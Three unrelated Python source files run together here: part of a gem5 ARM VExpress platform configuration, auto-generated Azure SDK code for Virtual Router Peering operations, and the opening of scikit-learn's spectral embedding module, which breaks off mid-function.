self.gicv2m = Gicv2m()
self.gicv2m.frames = [Gicv2mFrame(spi_base=256, spi_len=64, addr=0x2C1C0000)]
def setupBootLoader(self, mem_bus, cur_sys, loc):
self.nvmem = SimpleMemory(range = AddrRange('64MB'),
conf_table_reported = False)
self.nvmem.port = mem_bus.master
cur_sys.boot_loader = loc('boot_emm.arm')
cur_sys.atags_addr = 0x8000000
cur_sys.load_addr_mask = 0xfffffff
cur_sys.load_offset = 0x80000000
# Attach I/O devices that are on chip and also set the appropriate
# ranges for the bridge
def attachOnChipIO(self, bus, bridge):
self.gic.pio = bus.master
self.local_cpu_timer.pio = bus.master
if hasattr(self, "gicv2m"):
self.gicv2m.pio = bus.master
self.hdlcd.dma = bus.slave
# Bridge ranges based on excluding what is part of on-chip I/O
# (gic, a9scu)
bridge.ranges = [AddrRange(0x2F000000, size='16MB'),
AddrRange(0x2B000000, size='4MB'),
AddrRange(0x30000000, size='256MB'),
AddrRange(0x40000000, size='512MB'),
AddrRange(0x18000000, size='64MB'),
AddrRange(0x1C000000, size='64MB')]
self.vgic.pio = bus.master
# Set the clock domain for IO objects that are considered
# to be "close" to the cores.
def onChipIOClkDomain(self, clkdomain):
self.gic.clk_domain = clkdomain
if hasattr(self, "gicv2m"):
self.gicv2m.clk_domain = clkdomain
self.hdlcd.clk_domain = clkdomain
self.vgic.clk_domain = clkdomain
# Attach I/O devices to specified bus object. Done here
# as the specified bus to connect to may not always be fixed.
def attachIO(self, bus):
self.uart.pio = bus.master
self.realview_io.pio = bus.master
self.timer0.pio = bus.master
self.timer1.pio = bus.master
self.clcd.pio = bus.master
self.clcd.dma = bus.slave
self.hdlcd.pio = bus.master
self.kmi0.pio = bus.master
self.kmi1.pio = bus.master
self.cf_ctrl.pio = bus.master
self.cf_ctrl.dma = bus.slave
self.cf_ctrl.config = bus.master
self.rtc.pio = bus.master
bus.use_default_range = True
self.vram.port = bus.master
self.pciconfig.pio = bus.default
self.l2x0_fake.pio = bus.master
self.uart1_fake.pio = bus.master
self.uart2_fake.pio = bus.master
self.uart3_fake.pio = bus.master
self.sp810_fake.pio = bus.master
self.watchdog_fake.pio = bus.master
self.aaci_fake.pio = bus.master
self.lan_fake.pio = bus.master
self.usb_fake.pio = bus.master
self.mmc_fake.pio = bus.master
self.energy_ctrl.pio = bus.master
# Try to attach the I/O if it exists
try:
self.ide.pio = bus.master
self.ide.config = bus.master
self.ide.dma = bus.slave
self.ethernet.pio = bus.master
self.ethernet.config = bus.master
self.ethernet.dma = bus.slave
except:
pass
# Set the clock domain for IO objects that are considered
# to be "far" away from the cores.
def offChipIOClkDomain(self, clkdomain):
self.uart.clk_domain = clkdomain
self.realview_io.clk_domain = clkdomain
self.timer0.clk_domain = clkdomain
self.timer1.clk_domain = clkdomain
self.clcd.clk_domain = clkdomain
self.kmi0.clk_domain = clkdomain
self.kmi1.clk_domain = clkdomain
self.cf_ctrl.clk_domain = clkdomain
self.rtc.clk_domain = clkdomain
self.vram.clk_domain = clkdomain
self.pciconfig.clk_domain = clkdomain
self.l2x0_fake.clk_domain = clkdomain
self.uart1_fake.clk_domain = clkdomain
self.uart2_fake.clk_domain = clkdomain
self.uart3_fake.clk_domain = clkdomain
self.sp810_fake.clk_domain = clkdomain
self.watchdog_fake.clk_domain = clkdomain
self.aaci_fake.clk_domain = clkdomain
self.lan_fake.clk_domain = clkdomain
self.usb_fake.clk_domain = clkdomain
self.mmc_fake.clk_domain = clkdomain
self.energy_ctrl.clk_domain = clkdomain
class VExpress_EMM64(VExpress_EMM):
pci_io_base = 0x2f000000
pci_cfg_gen_offsets = True
# Three memory regions are specified totalling 512GB
_mem_regions = [(Addr('2GB'), Addr('2GB')), (Addr('34GB'), Addr('30GB')),
(Addr('512GB'), Addr('480GB'))]
def setupBootLoader(self, mem_bus, cur_sys, loc):
self.nvmem = SimpleMemory(range = AddrRange(0, size = '64MB'))
self.nvmem.port = mem_bus.master
cur_sys.boot_loader = loc('boot_emm.arm64')
cur_sys.atags_addr = 0x8000000
cur_sys.load_addr_mask = 0xfffffff
cur_sys.load_offset = 0x80000000
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualRouterPeeringsOperations(object):
"""VirtualRouterPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from a Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
"""Gets the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouterPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def update(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
"""Updates a Virtual Router Peering.
:param resource_group_name: The resource group name of the Virtual Router Peering.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering being updated.
:type peering_name: str
:param parameters: Parameters supplied to update Virtual Router Peering operation.
:type parameters: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouterPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualRouterPeering"]
"""Creates or updates the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:param parameters: Parameters supplied to the create or update Virtual Router Peering
operation.
:type parameters: ~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualRouterPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeering]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualRouterPeeringListResult"]
"""Lists all Virtual Router Peerings in a Virtual Router resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterPeeringListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_07_01.models.VirtualRouterPeeringListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeeringListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeeringListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings'} # type: ignore
|
|
"""Spectral Embedding"""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# Wei LI <kuantkid@gmail.com>
# License: BSD Style.
import warnings
import numpy as np
from scipy import sparse
from scipy.sparse.linalg import lobpcg
from scipy.sparse.linalg.eigen.lobpcg.lobpcg import symeig
from ..base import BaseEstimator, TransformerMixin
from ..externals import six
from ..utils import check_random_state
from ..utils.validation import atleast2d_or_csr
from ..utils.graph import graph_laplacian
from ..utils._csgraph import cs_graph_components
from ..utils.arpack import eigsh
from ..metrics.pairwise import rbf_kernel
from ..neighbors import kneighbors_graph
def _graph_connected_component(graph, node_id):
"""Find the largest graph connected components the contains one
given node
Parameters
----------
graph : array-like, shape: (n_samples, n_samples)
adjacency matrix of the graph, non-zero weight means an edge
between the nodes
node_id : int
The index of the query node of the graph
Returns
-------
connected_components : array-like, shape: (n_samples,)
An array of bool value indicates the indexes of the nodes
belong to the largest connected components of the given query
node
"""
connected_components = np.zeros(shape=(graph.shape[0]), dtype=np.bool)
connected_components[node_id] = True
n_node = graph.shape[0]
for i in range(n_node):
last_num_component = connected_components.sum()
_, node_to_add = np.where(graph[connected_components] != 0)
connected_components[node_to_add] = True
if last_num_component >= connected_components.sum():
break
return connected_components
def _graph_is_connected(graph):
""" Return whether the graph is connected (True) or Not (False)
Parameters
----------
graph : array-like or sparse matrix, shape: (n_samples, n_samples)
adjacency matrix of the graph, non-zero weight means an edge
between the nodes
Returns
-------
is_connected : bool
True means the graph is fully connected and False means not
"""
if sparse.isspmatrix(graph):
# sparse graph, find all the connected components
n_connected_components, _ = cs_graph_components(graph)
return n_connected_components == 1
else:
# dense graph, find all connected components start from node 0
return _graph_connected_component(graph, 0).sum() == graph.shape[0]
def _set_diag(laplacian, value):
"""Set the diagonal of the laplacian matrix and convert it to a
sparse format well suited for eigenvalue decomposition
Parameters
----------
laplacian : array or sparse matrix
The graph laplacian
value : float
The value of the diagonal
Returns
-------
laplacian : array or sparse matrix
An array of matrix in a form that is well suited to fast
eigenvalue decomposition, depending on the band width of the
matrix.
"""
n_nodes = laplacian.shape[0]
# We need all entries in the diagonal to values
if not sparse.isspmatrix(laplacian):
laplacian.flat[::n_nodes + 1] = value
else:
laplacian = laplacian.tocoo()
diag_idx = (laplacian.row == laplacian.col)
laplacian.data[diag_idx] = value
# If the matrix has a small number of diagonals (as in the
# case of structured matrices comming from images), the
# dia format might be best suited for matvec products:
n_diags = np.unique(laplacian.row - laplacian.col).size
if n_diags <= 7:
# 3 or less outer diagonals on each side
laplacian = laplacian.todia()
else:
# csr has the fastest matvec and is thus best suited to
# arpack
laplacian = laplacian.tocsr()
return laplacian
def spectral_embedding(adjacency, n_components=8, eigen_solver=None,
random_state=None, eigen_tol=0.0,
norm_laplacian=True, drop_first=True,
mode=None):
"""Project the sample on the first eigen vectors of the graph Laplacian.
The adjacency matrix is used to compute a normalized graph Laplacian
whose spectrum (especially the eigen vectors associated to the
smallest eigen values) has an interpretation in terms of minimal
number of cuts necessary to split the graph into comparably sized
components.
This embedding can also 'work' even if the ``adjacency`` variable is
not strictly the adjacency matrix of a graph but more generally
an affinity or similarity matrix between samples (for instance the
heat kernel of a euclidean distance matrix or a k-NN matrix).
However care must taken to always make the affinity matrix symmetric
so that the eigen vector decomposition works as expected.
Parameters
----------
adjacency : array-like or sparse matrix, shape: (n_samples, n_samples)
The adjacency matrix of the graph to embed.
n_components : integer, optional
The dimension of the projection subspace.
eigen_solver : {None, 'arpack', 'lobpcg', or 'amg'}
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities.
random_state : int seed, RandomState instance, or None (default)
A pseudo random number generator used for the initialization of the
lobpcg eigen vectors decomposition when eigen_solver == 'amg'.
By default, arpack is used.
eigen_tol : float, optional, default=0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
drop_first : bool, optional, default=True
Whether to drop the first eigenvector. For spectral embedding, this
should be True as the first eigenvector should be constant vector for
connected graph, but for spectral clustering, this should be kept as
False to retain the first eigenvector.
Returns
-------
embedding : array, shape=(n_samples, n_components)
The reduced samples.
Notes
-----
Spectral embedding is most useful when the graph has one connected
component. If there graph has many components, the first few eigenvectors
will simply uncover the connected components of the graph.
References
----------
* http://en.wikipedia.org/wiki/LOBPCG
* Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method
Andrew V. Knyazev
http://dx.doi.org/10.1137%2FS1064827500366124
"""
try:
from pyamg import smoothed_aggregation_solver
except ImportError:
if eigen_solver == "amg" or mode == "amg":
raise ValueError("The eigen_solver was set to 'amg', but pyamg is "
"not available.")
if not mode is None:
warnings.warn("'mode' was renamed to eigen_solver "
"and will be removed in 0.15.",
DeprecationWarning)
eigen_solver = mode
if eigen_solver is None:
eigen_solver = 'arpack'
elif not eigen_solver in ('arpack', 'lobpcg', 'amg'):
raise ValueError("Unknown value for eigen_solver: '%s'."
"Should be 'amg', 'arpack', or 'lobpcg'"
% eigen_solver)
random_state = check_random_state(random_state)
n_nodes = adjacency.shape[0]
# Whether to drop the first eigenvector
if drop_first:
n_components = n_components + 1
# Check that the matrices given is symmetric
if ((not sparse.isspmatrix(adjacency) and
not np.all((adjacency - adjacency.T) < 1e-10)) or
(sparse.isspmatrix(adjacency) and
(adjacency - adjacency.T).nnz > 0)):
warnings.warn("Graph adjacency matrix should be symmetric. "
"Converted to be symmetric by average with its "
"transpose.")
adjacency = .5 * (adjacency + adjacency.T)
if not _graph_is_connected(adjacency):
warnings.warn("Graph is not fully connected, spectral embedding"
" may not works as expected.")
laplacian, dd = graph_laplacian(adjacency,
normed=norm_laplacian, return_diag=True)
if (eigen_solver == 'arpack'
or eigen_solver != 'lobpcg' and
(not sparse.isspmatrix(laplacian)
or n_nodes < 5 * n_components)):
# lobpcg used with eigen_solver='amg' has bugs for low number of nodes
# for details see the source code in scipy:
# https://github.com/scipy/scipy/blob/v0.11.0/scipy/sparse/linalg/eigen
# /lobpcg/lobpcg.py#L237
# or matlab:
# http://www.mathworks.com/matlabcentral/fileexchange/48-lobpcg-m
laplacian = _set_diag(laplacian, 1)
# Here we'll use shift-invert mode for fast eigenvalues
# (see http://docs.scipy.org/doc/scipy/reference/tutorial/arpack.html
# for a short explanation of what this means)
# Because the normalized Laplacian has eigenvalues between 0 and 2,
# I - L has eigenvalues between -1 and 1. ARPACK is most efficient
# when finding eigenvalues of largest magnitude (keyword which='LM')
# and when these eigenvalues are very large compared to the rest.
# For very large, very sparse graphs, I - L can have many, many
# eigenvalues very near 1.0. This leads to slow convergence. So
# instead, we'll use ARPACK's shift-invert mode, asking for the
# eigenvalues near 1.0. This effectively spreads-out the spectrum
# near 1.0 and leads to much faster convergence: potentially an
# orders-of-magnitude speedup over simply using keyword which='LA'
# in standard mode.
try:
lambdas, diffusion_map = eigsh(-laplacian, k=n_components,
sigma=1.0, which='LM',
tol=eigen_tol)
embedding = diffusion_map.T[n_components::-1] * dd
except RuntimeError:
# When submatrices are exactly singular, an LU decomposition
# in arpack fails. We fallback to lobpcg
eigen_solver = "lobpcg"
if eigen_solver == 'amg':
# Use AMG to get a preconditioner and speed up the eigenvalue
# problem.
if not sparse.issparse(laplacian):
warnings.warn("AMG works better for sparse matrices")
laplacian = laplacian.astype(np.float) # lobpcg needs native floats
laplacian = _set_diag(laplacian, 1)
ml = smoothed_aggregation_solver(atleast2d_or_csr(laplacian))
M = ml.aspreconditioner()
X = random_state.rand(laplacian.shape[0], n_components + 1)
X[:, 0] = dd.ravel()
lambdas, diffusion_map = lobpcg(laplacian, X, M=M, tol=1.e-12,
largest=False)
embedding = diffusion_map.T * dd
if embedding.shape[0] == 1:
raise ValueError
elif eigen_solver == "lobpcg":
laplacian = laplacian.astype(np.float) # lobpcg needs native floats
if n_nodes < 5 * n_components + 1:
# see note above under arpack why lobpcg has problems with small
